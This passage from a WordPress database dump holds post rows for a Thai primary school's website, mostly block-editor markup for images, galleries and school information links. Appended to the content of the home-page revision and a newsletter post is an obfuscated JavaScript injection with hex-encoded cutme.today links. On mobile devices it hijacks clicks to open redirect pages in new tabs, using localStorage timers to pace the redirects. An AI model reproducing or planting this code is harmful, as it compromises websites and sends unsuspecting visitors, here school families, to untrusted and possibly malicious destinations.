)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 22:36:27','2024-07-27 15:36:27','',14,'http://pakhaeng.ssk.in.th/?p=186',0,'revision','',0),
(187,1,'2024-07-27 22:37:54','2024-07-27 15:37:54','<!-- wp:image {\"id\":189,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1-2566-2-724x1024.png\" alt=\"\" class=\"wp-image-189\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c','','','2024-07-27 22:37:56','2024-07-27 15:37:56','',0,'http://pakhaeng.ssk.in.th/?p=187',0,'post','',0),
(188,1,'2024-07-27 22:37:12','2024-07-27 15:37:12','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- 